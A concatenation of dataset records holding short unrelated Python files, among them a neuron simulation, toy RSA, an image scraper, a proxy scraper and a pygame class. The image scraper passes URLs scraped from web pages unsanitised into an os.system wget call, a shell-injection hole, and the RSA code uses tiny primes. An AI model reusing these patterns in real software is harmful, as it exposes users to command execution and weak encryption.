self.curstep]\n self.IKi = self.IK[:, self.curstep]\n self.Imi = self.Im[:, self.curstep]\n self.ItCai = self.ItCa[:, self.curstep]\n\n self.Isyni = self.Isyn[:, self.curstep]\n self.IAMPAi = self.IAMPA[:, self.curstep]\n self.INMDAi = self.INMDA[:, self.curstep]\n\n self.Inoisei = self.Inoise[:, self.curstep]\n\n self.mi = self.m[:, self.curstep]\n self.hi = self.h[:, self.curstep]\n self.ni = self.n[:, self.curstep]\n self.pi = self.p[:, self.curstep]\n self.ui = self.u[:, self.curstep]\n\n self.alpha_mi = self.alpha_m[:, self.curstep]\n self.beta_mi = self.beta_m[:, self.curstep]\n self.alpha_hi = self.alpha_h[:, self.curstep]\n self.beta_hi = self.beta_h[:, self.curstep]\n self.alpha_ni = self.alpha_n[:, self.curstep]\n self.beta_ni = self.beta_n[:, self.curstep]\n self.p_infi = self.p_inf[:, self.curstep]\n self.tau_pi = self.tau_p[:, self.curstep]\n self.s_infi = self.s_inf[:, self.curstep]\n self.u_infi = self.u_inf[:, self.curstep]\n self.tau_ui = self.tau_u[:, self.curstep]\n\n for i in range(0, self.N):\n self.calc_synaptic_input(i)\n\n # noise type\n # 1 : gaussian white noise\n # 2 : Ornstein-Uhlenbeck process\n # 3 : pass (no noise)\n # 4 : DC\n # 5 : AMPA noise\n\n if self.noise == 1:\n self.Inoise[:, self.curstep + 1] = self.D * self.g[:, self.curstep]\n\n elif self.noise == 2:\n self.Inoise[:, self.curstep + 1] = (self.Inoisei +\n (- self.alpha * (self.Inoisei - self.beta) * self.dt\n + self.D * self.g[:, self.curstep]))\n\n elif self.noise == 3:\n pass\n\n elif self.noise == 4:\n self.Inoise[:, self.curstep + 1] = 0.2\n\n elif self.noise == 5:\n self.Inoise[:, self.curstep + 1] = (np.random.normal(loc=0, scale=self.gaussian_scale)\n + np.random.poisson(lam=self.poisson_lam) * self.A_SE_AMPA * 2)\n\n # solve a defferential equation\n self.alpha_mi = self. 
activation_func_ReLUlike(-0.32, self.Vth + 13, -1/4, self.Vth + 13, self.Vi)\n        self.beta_mi = self.activation_func_ReLUlike(0.28, self.Vth + 40, 1/5, self.Vth + 40, self.Vi)\n        self.alpha_hi = self.activation_func_exp(0.128, -1/18, self.Vth + 17, self.Vi)\n        self.beta_hi = self.activation_func_sigmoid(4, -1/5, self.Vth + 40, self.Vi)\n        self.alpha_ni = self.activation_func_ReLUlike(-0.032, self.Vth + 15, -1/5, self.Vth + 15, self.Vi)\n        self.beta_ni = self.activation_func_exp(0.5, -1/40, self.Vth + 10, self.Vi)\n        self.p_infi = self.activation_func_sigmoid(1, -1/10, -35, self.Vi)\n        self.tau_pi = (self.tau_max /\n                       (3.3 * np.exp(np.clip((self.Vi + 35) / 20, -709, 10000)) +\n                        np.exp(- np.clip((self.Vi + 35) / 20, -709, 10000))))\n        self.s_infi = self.activation_func_sigmoid(1, -1/6.2, -2 - 57, self.Vi)\n        self.u_infi = self.activation_func_sigmoid(1, 1/4, -2 - 81, self.Vi)\n        self.tau_ui = 30.8 + (211.4 + np.exp(np.clip((self.Vi + 2 + 113.2) / 5, -709, 10000))) / \\\n                      (3.7 * (1 + np.exp(np.clip((self.Vi + 2 + 84) / 3.2, -709, 10000))))\n\n        self.Ileaki = self.gleak * (self.eleak - self.Vi)\n        self.INai = self.gNa * self.mi ** 3 * self.hi * (self.eNa - self.Vi)\n        self.IKi = self.gK * self.ni ** 4 * (self.eK - self.Vi)\n        self.Imi = self.gm * self.pi * (self.eK - self.Vi)\n        self.ItCai = self.gtCa * self.s_infi ** 2 * self.ui * (self.eCa - self.Vi)\n\n        \"\"\"\n        self.dV = (self.dt *\n                   (self.Ileaki + self.INai + self.IKi + self.Imi + self.ItCai +\n                    self.Isyni + self.Inoisei + self.Iext[:, self.curstep]) /\n                   self.Cm)\n        \"\"\"\n        self.dV = (self.dt *\n                   (self.Ileaki + self.INai + self.IKi + self.Imi +\n                    self.Isyni + self.Inoisei + self.Iext[:, self.curstep]) /\n                   self.Cm)\n\n        # When (self.curstep * self.dt) < 200, isn't self.Isyni always 0?\n        if (self.curstep * self.dt) < 200:\n            self.dV -= self.Isyni\n\n        self.dm = self.dt * (self.alpha_mi * (1 - self.mi) - self.beta_mi * self.mi)\n        self.dh = self.dt * (self.alpha_hi * (1 - self.hi) - self.beta_hi * self.hi)\n        self.dn = self.dt * (self.alpha_ni * (1 - self.ni) - self.beta_ni * self.ni)\n        self.dp = self.dt * (self.p_infi - self.pi) / self.tau_pi\n        self.du = self.dt * (self.u_infi - self.ui) / self.tau_ui\n\n        self.V[:, self.curstep + 1] = self.Vi + self.dV\n\n        self.m[:, self.curstep + 1] = self.mi + self.dm\n        self.h[:, self.curstep + 1] = self.hi + self.dh\n        self.n[:, self.curstep + 1] = self.ni + self.dn\n        self.p[:, self.curstep + 1] = self.pi + self.dp\n        self.u[:, self.curstep + 1] = self.ui + self.du\n\n        self.Ileak[:, self.curstep] = self.Ileaki\n        self.INa[:, self.curstep] = self.INai\n        self.IK[:, self.curstep] = self.IKi\n        self.Im[:, self.curstep] = self.Imi\n        self.ItCa[:, self.curstep] = self.ItCai\n\n        self.Isyn[:, self.curstep] = self.Isyni\n\n        self.curstep += 1\n\n\n\"\"\"\ndef main():\n    neuron = Neuron_HH(syncp=2, U_SE_AMPA=0.7, tau_rise_AMPA=1.1, A_SE_AMPA=0.3, A_SE_NMDA=0.4, noise=2, T=70000, Iext_amp=10)\n    for i in range(0, neuron.allsteps-1):\n        neuron.propagation()\n\n    ax1 = plt.subplot2grid((3, 1), (0, 0))\n    ax1.plot(neuron.Tsteps, neuron.V[0])\n    ax1.set_title('V')\n    ax2 = plt.subplot2grid((3, 1), (1, 0))\n    ax2.plot(neuron.Tsteps, neuron.IAMPA[0])\n    ax2.set_title('I_AMPA [uA]')\n    ax3 = plt.subplot2grid((3, 1), (2, 0))\n    ax3.plot(neuron.Tsteps, neuron.INMDA[0])\n    ax3.set_title('I_NMDA [uA]')\n\n    plt.tight_layout()\n    plt.show()\n\n\nif __name__ == '__main__':\n    
main()\n\"\"\"\n","sub_path":"HHmodel_folder/MinimalHH_class_AF_DecaySyn/neuron_class.py","file_name":"neuron_class.py","file_ext":"py","file_size_in_byte":20361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"460985781","text":"import random\n\n\n\ndef encrypt(message, key):\n    enc_m = ''\n    for byte in bytearray(message, 'utf-8'):\n        c = byte ** key[1] % key[0]\n        enc_m += hex(c)\n    return enc_m\n\n\ndef decrypt(message, key):\n    res = ''\n    splited_mess = message.split('0x')\n    for byte in splited_mess:\n        if byte != '':\n            dec_mess = int(byte, 16) ** key[1] % key[0]\n            res += chr(dec_mess)\n    return res\n\n\ndef generate_keys(size):\n    # NOTE: toy RSA. The original drew arbitrary odd (usually composite) numbers via\n    # random.choice(size) and random.randint(size), both of which also crash when\n    # given a single int. Drawing two distinct small primes keeps the calls valid and\n    # makes the encrypt/decrypt roundtrip correct; 'size' is kept only for the caller.\n    primes = [101, 103, 107, 109, 113, 127, 131, 137, 139, 149]\n    p = random.choice(primes)\n    q = random.choice([x for x in primes if x != p])\n    n = p * q\n    fi_n = (p - 1) * (q - 1)\n    e = 11\n    start_k = 0\n    k = generate_k(start_k, fi_n, e)\n    d = int((k * fi_n + 1) / e)\n    return (n, e), (n, d)\n\n\ndef generate_k(k, fi_n, e):\n    res = (k * fi_n + 1) % e\n    if res == 0:\n        return k\n    else:\n        return generate_k(k=k + 1, fi_n=fi_n, e=e)\n\n\nst_message = 'hello world how are you, bro .'\npublicKey, privateKey = generate_keys(20)\nencrypted_message = encrypt(st_message, publicKey)\ndecrypred_message = decrypt(encrypted_message, privateKey)\nprint(encrypted_message)\nprint(decrypred_message)\n","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"206333491","text":"import turtle\r\n\r\nrainbow = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\r\n\r\n# Write whatever code you want here!\r\nterry = turtle.Turtle()\r\nterry.width(10)\r\nfor color in rainbow:\r\n    \r\n    terry.color(color)\r\n    terry.forward(50)\r\n    terry.right(60)\r\n    \r\nterry.hideturtle()","sub_path":"3_29-六边形练习.py","file_name":"3_29-六边形练习.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"462583514","text":"#!/usr/bin/env python3\n\n\"\"\"Debugs the is_an_oak function and modifies its output\"\"\"\n\n__appname__ = '[oaks_debugme.py]'\n__author__ = 'CMEE G1'\n__version__= '0.0.1'\n__license__ = \"License for this code/program\"\n\nimport csv\nimport sys\n\n#Define function\ndef is_an_oak(name):\n    \"\"\" Returns True if name starts with 'quercus' \n    >>> is_an_oak('Quercus')\n    True\n\n    >>> is_an_oak('Pinus')\n    False\n\n    >>> is_an_oak('Quercus robur')\n    True\n\n    >>> is_an_oak('Quercuss')\n    True\n\n    >>> is_an_oak('Quercuss robur')\n    False\n\n    >>> is_an_oak('QQuercus')\n    False\n\n    >>> is_an_oak('QUERCUS')\n    True\n    \"\"\"\n    return name.lower().startswith('quercus')\n\n    \ndef main(argv): \n    \"\"\"Main function that runs\"\"\"\n    f = open('../Data/TestOaksData.csv','r')\n    g = open('../Data/JustOaksData.csv','w')\n    taxa = csv.reader(f)\n    csvwrite = csv.writer(g)\n    csvwrite.writerow([\"Genus\", \"species\"])\n\n    for row in taxa:\n        if row[0].lower() != \"genus\":\n            print(row)\n            print(\"The genus is: \") \n            print(row[0] + '\\n')\n            if is_an_oak(row[0]):\n                print('FOUND AN OAK!\\n')\n                csvwrite.writerow([row[0], row[1]]) \n\n    return 0\n    \nif (__name__ == \"__main__\"):\n    \"\"\"Ensures main function runs when script is called\"\"\"\n    status = 
main(sys.argv)\n","sub_path":"Week2/Code/oaks_debugme.py","file_name":"oaks_debugme.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"596000270","text":"# -*- coding: utf-8 -*- \n\n# ported to Python 3: urllib2 and HTMLParser were Python 2 modules\nimport os\nimport sys\nimport datetime\nimport struct\nimport urllib.request\nfrom html.parser import HTMLParser\nimport time\n\n\ndef parse_jpeg(res):\n    while not res.closed:\n        (marker, size) = struct.unpack('>2sH', res.read(4))\n        if marker == b'\\xff\\xc0':\n            (_,height,width,_) = struct.unpack('>chh10s', res.read(size-2))\n            return (width,height)\n        else:\n            res.read(size-2)\n\ndef parse_png(res):\n    (_,width,height) = struct.unpack(\">14sII\", res.read(22))\n    return (width, height)\n\ndef parse_gif(res):\n    (_,width,height) = struct.unpack(\"<4sHH\", res.read(8))\n    return (width, height)\n\ndef get_image_size(url):\n    res = urllib.request.urlopen(url)\n    size = (-1,-1)\n    if res.status == 200:\n        signature = res.read(2)\n        if signature == b'\\xff\\xd8':#jpg\n            size = parse_jpeg(res)\n        elif signature == b'\\x89\\x50':#png\n            size = parse_png(res)\n        elif signature == b'\\x47\\x49':#gif\n            size = parse_gif(res)\n    res.close()\n    return size\n\n\ndef download(url):\n\n    my_files = os.listdir('./')\n    d_file = os.path.basename(url)\n    \n    for file in my_files:\n        if d_file == file:\n            print (\"you already have it\")\n            return False\n\n    # accept only urls ending in 'g' (jpg/png) or 'f' (gif); the original condition\n    # lacked these parentheses and so rejected every gif\n    if not (url.endswith('g') or url.endswith('f')):\n        return False\n\n    # file = cStringIO.StringIO(urllib.urlopen(url).read())\n    # image = Image.open(file)\n    width, height = get_image_size(url)\n\n    b = len(urllib.request.urlopen(url).read()) > 20000 and height > 200 and width > 200\n    # localfile = open(os.path.basename(url),'wb')\n    # localfile.write(urllib.urlopen(url).read())\n    # localfile.close \n    \n    return b\n\nclass imgParser(HTMLParser):\n\n    def __init__(self):\n        HTMLParser.__init__(self)\n\n    def handle_starttag(self,tagname,attribute):\n        if tagname.lower() == \"img\":\n            for i in attribute:\n                if i[0].lower() == \"src\":\n                    img_url=i[1]\n                    # create a file collecting the image URLs found on the page\n                    f = open(\"collection_url.txt\",\"a\")\n                    f.write(\"%s\\t\"%img_url)\n                    f.close()\n\nif __name__ == \"__main__\":\n\n    #print('Enter the URL of the site you want to fetch images from.')\n    argc = len(sys.argv)\n    input_url = sys.argv[1]\n    htmldata = urllib.request.urlopen(input_url)\n\n    if argc == 3:\n        folder_name = sys.argv[2]\n    else:\n        folder_name = datetime.datetime.today().strftime(\"%Y%m%d_%H:%M\")\n    os.mkdir(\"./img/{0}\".format(folder_name))\n\n    os.chdir(\"./img/{0}\".format(folder_name))\n    \n\n    print('start')\n    start = time.time()\n\n    parser = imgParser()\n    parser.feed(htmldata.read().decode('utf-8', errors='ignore'))  # feed() needs str in Python 3\n\n    parser.close()\n    htmldata.close()\n\n    # read back the generated URL file\n    f = open(\"collection_url.txt\",\"r\")\n    for row in f:\n        row_url = row.split('\\t')\n        len_url = len(row_url)\n    f.close()\n\n    number_url = []\n\n    for i in range(0,(len_url-1)):\n        number_url.append(row_url[i])\n\n    for j in range(0,(len_url-1)):\n        print(j, end=' ')\n        url = number_url[j]\n        if download(url):\n            os.system('wget --quiet {1}'.format(folder_name, url))\n            print (\"ok\")\n    print('complete')\n    elapsed_time = time.time() - start\n    print(\"elapsed_time:{0}\".format(elapsed_time))\n\n    # delete the temporary URL file\n    os.remove(\"collection_url.txt\")","sub_path":"forreference/getimage_wget.py","file_name":"getimage_wget.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"399264314","text":"\nfrom utils import save_dir, data_dir, train_pool, 
analyze_dir,save_dict\nfrom utils.analysis_utils import analyze_pool\nimport pickle\nimport os\nimport re\nimport numpy as np\nimport argparse\nimport fnmatch\nparser = argparse.ArgumentParser(description='run mftma and save results')\nparser.add_argument('model_id', type=str, default='NN-tree_nclass=64_nobj=64000_nhier=6_beta=0.02_sigma=0.83_nfeat=3072-train_test-fixed')\nparser.add_argument('analyze_id', type=str, default='mftma-exm_per_class=50-proj=False-rand=False-kappa=0-n_t=300-n_rep=1')\nparser.add_argument('train_id', type=str, default='')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n model_identifier = args.model_id\n analyze_identifier = args.analyze_id\n train_dir_identifier = args.train_id\n params = train_pool[model_identifier]()\n layer_names = params.get_layer_names()\n model_identifier_for_saving = params.identifier.translate(str.maketrans({'[': '', ']': '', '/': '_'}))\n\n analyze_params = analyze_pool[analyze_identifier]()\n analyze_identifier_for_saving = analyze_params.identifier.translate(str.maketrans({'[': '', ']': '', '/': '_'}))\n # find layers\n # manually walk through the files\n covar_files = []\n for file in os.listdir(os.path.join(analyze_dir, analyze_identifier_for_saving,model_identifier_for_saving,train_dir_identifier)):\n if fnmatch.fnmatch(file, '*_center_covar.pkl'):\n covar_files.append(os.path.join(analyze_dir, analyze_identifier_for_saving,model_identifier_for_saving,train_dir_identifier, file))\n s = [re.findall('/\\d+', x) for x in covar_files]\n s = [item for sublist in s for item in sublist]\n file_id = [int(x.split('/')[1]) for x in s]\n sorted_files = [covar_files[x] for x in np.argsort(file_id)]\n\n # do layerwise saving\n covar_pooled = dict()\n for idx, layer in enumerate(layer_names):\n s = np.asarray([int(not not re.findall(layer, x)) for x in sorted_files])\n layer_files=[sorted_files[int(x)] for x in np.argwhere(s)]\n x_idx=np.argwhere(s)\n layer_results=[]\n for id_file, file in enumerate(layer_files):\n data_=pickle.load(open(file, 'rb'))\n assert(data_['layer_name']==layer)\n s =re.findall('-batchidx=\\d+', file)\n batchidx = [int(x.split('=')[1]) for x in s][0]\n s = re.findall('-epoch=\\d+', file)\n epochidx = [int(x.split('=')[1]) for x in s][0]\n\n layer_results.append(dict(center_covar=data_['covar_results'], epoch=epochidx, batch=batchidx,\n seq=id_file,train_acc=data_['train_acc'],test_acc=data_['test_acc'] , file=file))\n covar_pooled[layer]=layer_results\n pool_file = os.path.join(analyze_dir,analyze_identifier_for_saving,model_identifier_for_saving,train_dir_identifier, f'{model_identifier_for_saving}_center_covar_pooled.pkl')\n d_master = {'analyze_identifier': analyze_identifier,\n 'model_identifier': model_identifier,\n 'train_identifier': train_dir_identifier,\n 'center_covar_results': covar_pooled,\n 'file_generated': pool_file}\n save_dict(d_master, pool_file)\n print('saved '+pool_file)\n print('done')\n\n\n\n\n\n\n\n","sub_path":"center_covar_pool_results.py","file_name":"center_covar_pool_results.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149315870","text":"# Third party\n\n# Local\nfrom reference_resolver import main as rr\n\ncitation = 'Senís, Elena, et al. \"CRISPR/Cas9‐mediated genome engineering: An adeno‐associated viral (AAV) vector ' + \\\n 'toolbox. 
Biotechnology journal 9.11 (2014): 1402-1412.'\n\nlink = 'http://onlinelibrary.wiley.com/doi/10.1002/biot.201400046/references'\n\ndoi = '10.1002/biot.201400046'\n\ndoi = '10.1016/S0304-3991(00)00076-0'\n\n#paper_info = rr.resolve_citation(citation)\n#print(paper_info['entry'])\n#print(paper_info['references'][0])\n#print(paper_info.keys())\n\n#paper_info = rr.resolve_doi(doi)\n\ndoi = '10.1038/nrg3686'\n\npaper_info = rr.paper_info_from_doi(doi, skip_saved=True)\nreferences = paper_info.references\n\n#print(refs)\n#print(len(refs))\n'''\nsession = Session()\n\nmainentry = session.query(tables.MainPaperInfo).all()\nrefs = session.query(tables.References).all()\nmapping = session.query(tables.RefMapping).all()\n'''\n\nimport pdb\npdb.set_trace()\n","sub_path":"ref_resolve_test_code.py","file_name":"ref_resolve_test_code.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"7258731","text":"from urllib import request as ur\nfrom lxml import etree\n\npagenum = 1\nresed = ur.urlopen(url='http://www.httpbin.org/ip').read().decode()  # the IP we currently appear as\n\nwhile True:\n    url = 'https://www.kuaidaili.com/free/intr/' + str(pagenum)  # paginated URL of the proxy-IP listing site\n    pagenum += 1  # crawl page after page\n    res = ur.urlopen(url=url).read().decode()  # fetch each listing page\n    ele = etree.HTML(res)  # parse the HTML document\n    ips = ele.xpath(\"//td[@data-title='IP']/text()\")  # extract the IPs\n    ports = ele.xpath(\"//td[@data-title='PORT']/text()\")  # extract the ports\n    types = ele.xpath(\"//td[@data-title='类型']/text()\")  # extract the protocol types (the site's column header is Chinese for 'type')\n    proxy = {}\n    for i in range(len(ips)):\n        proxy[types[i].lower()] = ips[i] + ':' + ports[i]  # store as a type -> 'ip:port' pair\n    handler = ur.ProxyHandler(proxy)  # urllib proxy handler\n    opener = ur.build_opener(handler)  # build an opener object that supports more features\n    print(proxy)\n    try:\n        now_res = opener.open('http://www.httpbin.org/ip', timeout=3).read().decode()  # with a timeout\n        print(resed)\n        print(now_res)\n        if resed != now_res:  # if the proxy is usable, save it to a file\n            with open('proxy1.txt', 'a+', encoding='utf-8') as w:\n                w.write(str(proxy) + '\\n')\n            proxy = {}\n\n    except:\n        proxy = {}\n","sub_path":"Replace/晨讲/珍爱网/ip_pools/get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"220439244","text":"#analyze quadruplet data using hierarchical MAPDS\n#this is using Selim's data as proof of concept. 
Will have to rewrite data handling.\nfrom glob import glob\nimport os\nfrom os.path import join\nimport numpy as np\nimport pickle\nimport pystan\nfrom pystan import StanModel\nfrom ipdb import set_trace\n\nif __name__ == '__main__':\n    #where to find data, also look for subjects.\n    dataDir = r'C:\\Users\\neugebauer\\Documents\\Experiments\\graveyard\\adap_MAPDS\\testData'\n    subDirs = glob(join(dataDir,'s*'))\n\n    #unpickle model\n    modPath = r'C:\\Users\\neugebauer\\Documents\\Experiments\\MAPDS\\stanModels\\hierModel.pic'\n    model = pickle.load(open(modPath,'rb'))\n\n    #prepare empty arrays for data, infer every necessary piece of information before.\n    nTrial = 216 \n    nStim = 8\n    nFreeStim = nStim - 2\n    nSub = len(subDirs)\n    fixPos = [(0.,1.),(0.,-1.)]\n\n    resp = np.zeros((nTrial,nSub))\n    stimlist = np.zeros((nTrial,4,nSub))\n\n    #these are the necessary parameters\n    #int \t\tnTrial; //number of trials - this is assuming the same number for everyone\n    ###int \t\tnStim; //all stimuli including fixed ones.\n    #int         nSub; //number of subjects \n    #int nFreeStim; //only the number of free parameters\n    #matrix[2,2] \t\t\t\tfixPos; //two fixed points: The first one and the fifth one.\n    #int\tresp[nTrial,nSub]; //vector of responses that were given\n    #int\tstimlist[nTrial,4,nSub]; //the stimlist that was being used, one per subject. Might be easier to use one for all, we'll see.\n\n    #load data for each subject, combine responses\n    for sub,path in enumerate(subDirs):\n        try:\n            data = pickle.load(open(join(path,'data.pic'),'rb'))\n            stimlist[:,:,sub] = data['phase2']['stimlist'][0:nTrial,:]\n            resp[:,sub] = data['phase2']['responses'][0:nTrial].squeeze()\n        except:\n            pass\n    del data\n    #prepare the dict for pystan\n    data = {'nTrial': nTrial, 'nStim': nStim, 'nSub': nSub, 'nFreeStim': \n        nFreeStim, 'fixPos': fixPos, 'resp': resp.astype(int), 'stimlist': \n        stimlist.astype(int)}\n    #function to generate initial values\n    def init():\n        '''\n        Stan behavior is more predictable and we need fewer runs if we choose\n        sensible values to initialize the process. This can either be done\n        by giving a list of dicts of initial values, one dict per chain you \n        want to run, or by giving a function that returns a dict of initial \n        values; PyStan then calls it as often as necessary to produce \n        starting values for all the chains you want to run. This is that\n        function for the hierarchical model. We use this approach because it is\n        more flexible and agnostic towards the number of chains to be used. \n\n        These are the parameters that need to be estimated and thus initialized\n        matrix[nFreeStim,2] freePosSub[nSub]; \n        matrix[nFreeStim,2] freePosMu; \n        real freePosSigma; \n        real sigma[nSub]; \n        '''\n        #angles from 0 to 315 degrees as radians\n        ang = np.deg2rad(np.linspace(0,360,nStim +1)[:-1])\n        #free positions of perfect circle without noise as starting values for\n        #the group level positions. Will add some noise later\n        freePosMu = np.delete(np.array([np.sin(ang),np.cos(ang)]).T,[0,4],0)\n        #party people, make some noise! These are noise circles for subjects\n        freePosSub = [(freePosMu + np.random.randn(*freePosMu.shape)).tolist()\\\n                      for _ in range(nSub)]\n        #sigma of free positions, i.e. how much do people differ?\n        freePosSigma = np.random.rand() * 0.2\n        #individual noise term for likelihood function\n        sigma = [np.random.rand()*0.2 for _ in range(nSub)]\n        #add some noise to the group level. 
Just a bit though.\n        freePosMu += (np.random.randn(*freePosMu.shape) * 0.05).tolist()\n        initDict = {'freePosSub': freePosSub,'freePosMu': freePosMu, \n                    'freePosSigma': freePosSigma,'sigma': sigma}\n        return initDict\n\n    #run Model\n    counter = 0\n    success = False\n    while counter < 100 and not success:\n        try:\n            print('Run # {}'.format(counter))\n            fit = model.sampling(data,chains=1,init='0')#,init = init);\n            set_trace()\n            print('Done.')\n            print('successful run in run # {}'.format(counter))\n            with open('successfullFit.pic','wb') as f:\n                pickle.dump(fit,f,-1)\n            success = True\n        except:\n            counter +=1\n    try:\n        opt = model.optimizing(data)\n        set_trace()\n        print('optimizing worked.')\n        with open('successfullyOptimized.pic','wb') as f:\n            pickle.dump(opt,f,-1)\n    except:\n        pass\n","sub_path":"analysis/runHierarchModel.py","file_name":"runHierarchModel.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"23992525","text":"\nimport os\nimport numpy as np\nimport json\n#from ipywidgets import interact\nimport matplotlib.pyplot as plt\nimport torch\nimport random\nimport re\nfrom tqdm import tqdm\nfrom espnet.asr.pytorch_backend.asr import load_trained_model\n\nimport matplotlib\n#matplotlib.use('TkAgg')\n\n\ni = 30\nmodel, train_args = load_trained_model(f'exp/train_pytorch_wav2vecfexlgcn/results/snapshot.ep.{i}')\ndevice = torch.device('cuda')\nmodel = model.float()\nmodel = model.to(device)\n\nwith open('dump/train/deltafalse/data.json.npy') as f:\n    js = json.load(f)['utts']\n    \ndef get_lang(d):\n    s = d.split('_')[0]\n    s = re.sub(r'\\d+$', '', s.split('-')[0]) if re.search('[a-zA-Z]+', s) else s\n    return s\n\ndef to_onehot(ys):\n    uniq = sorted(list(np.unique(ys)))\n    \n    out = np.zeros((len(ys), len(uniq)))\n    l2int = {l: i for i, l in enumerate(uniq)}\n    print(l2int)\n    for i, l in enumerate(ys):\n        out[i, l2int[l]] = 1\n    return out\n\ndef to_int(ys):\n    uniq = sorted(list(np.unique(ys)))\n    \n#     out = np.zeros((len(ys), len(uniq)))\n    l2int = {l: i for i, l in enumerate(uniq)}\n    print(l2int)\n    out = np.array([l2int[l] for i, l in enumerate(ys)])\n    return out\nn_sample = 1000\nframe_ratio = 0.1\n\nxs = []\nys = []\nrandom.seed(2)\nwith torch.no_grad():\n    for k, v in tqdm(random.sample(list(js.items()), n_sample)):  # dict views are not sequences, so wrap in list()\n        lang = get_lang(k)\n        x = torch.FloatTensor(np.load(v['input'][0]['feat'])).to(device)\n        features = model.encode(x, lang_labels=['N'])\n        \n        features = features.squeeze(0).detach().cpu().numpy()\n        T, d = features.shape\n        n_frame = int(frame_ratio * T)\n        ys.extend([lang] * n_frame)\n        idx = random.sample(list(range(T)), n_frame)\n        xs.append(features[idx])\n#         break\n    xs = np.vstack(xs)\n    \n    \nX = np.array(xs)\nY = to_int(ys)\nprint(X.shape, Y.shape)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import accuracy_score, f1_score\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=1)\n\nclf = LinearSVC(random_state=0).fit(X_train, y_train)\ny_pred = clf.predict(X_test)\n\nfrom pprint import pprint\nuniq = sorted(list(np.unique(ys)))\n\nacc = accuracy_score(y_test, y_pred)\nf1_macro = f1_score(y_test, y_pred, average='macro')\nf1_micro = f1_score(y_test, y_pred, average='micro')\nf1 = f1_score(y_test, y_pred, average=None)\n\nprint('acc', acc, 'f1_macro', f1_macro, 'f1_micro', f1_micro)\npprint(list(zip(uniq, 
f1)))\n","sub_path":"egs/low-resource-language/asr1-cross/acc.py","file_name":"acc.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"435026677","text":"# -*- coding: utf-8 -*-\nimport pygame\nfrom pygame.sprite import Sprite\n\nclass Ship(Sprite):\n\n    def __init__(self, ai_settings, screen):\n        \"\"\"Initialize the ship and set its starting position\"\"\"\n        super(Ship,self).__init__()\n        self.screen = screen\n        self.ai_settings = ai_settings\n        # load the ship image and get its bounding rect\n        self.image = pygame.image.load(\"images/ship.bmp\")\n        self.rect = self.image.get_rect()  # bounding rect of the ship image\n        self.screen_rect = screen.get_rect()  # bounding rect of the screen\n        # start each new ship at the bottom center of the screen\n        self.rect.centerx = self.screen_rect.centerx  # center the ship horizontally\n        self.rect.bottom = self.screen_rect.bottom  # align the ship with the bottom of the screen\n        # store a float for the ship's horizontal center\n        self.center = float(self.rect.centerx)\n        # movement flags, set while the player holds the arrow keys\n        self.moving_right = False\n        self.moving_left = False\n\n\n\n    def update(self):\n        # the comparison operators here were lost in the source (stripped like HTML tags);\n        # reconstructed: move right/left while staying inside the screen\n        if self.moving_right and self.rect.right < self.screen_rect.right:\n            self.center += self.ai_settings.ship_speed_factor\n        if self.moving_left and self.rect.left > self.screen_rect.left:\n            self.center -= self.ai_settings.ship_speed_factor\n\n        self.rect.centerx = self.center\n\n    def blitme(self):\n        # draw the ship at its current position\n        self.screen.blit(self.image, self.rect)  # blit using the ship's rect, which carries the position set above\n\n    def center_ship(self):\n        self.center = self.screen_rect.centerx\n\n","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"554333508","text":"# This file is part of pycopancore.\n#\n# Copyright (C) 2016 by COPAN team at Potsdam Institute for Climate\n# Impact Research\n#\n# URL: <http://www.pik-potsdam.de/copan/software>\n# License: MIT license\n\n\"\"\"\npycopancore\n===========\n\nSubpackages\n-----------\n\nNone yet.\n\n\"\"\"\n\n\n__author__ = \"Jonathan F. Donges \"\n__copyright__ = \\\n    \"Copyright (C) 2016 Jonathan F. Donges and COPAN team\"\n__license__ = \"MIT license\"\n__url__ = \"http://www.pik-potsdam.de/copan/software\"\n__version__ = \"0.1.0\"\n__date__ = \"2016-05-30\"\n__docformat__ = \"restructuredtext en\"\n","sub_path":"pycopancore/individuals/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
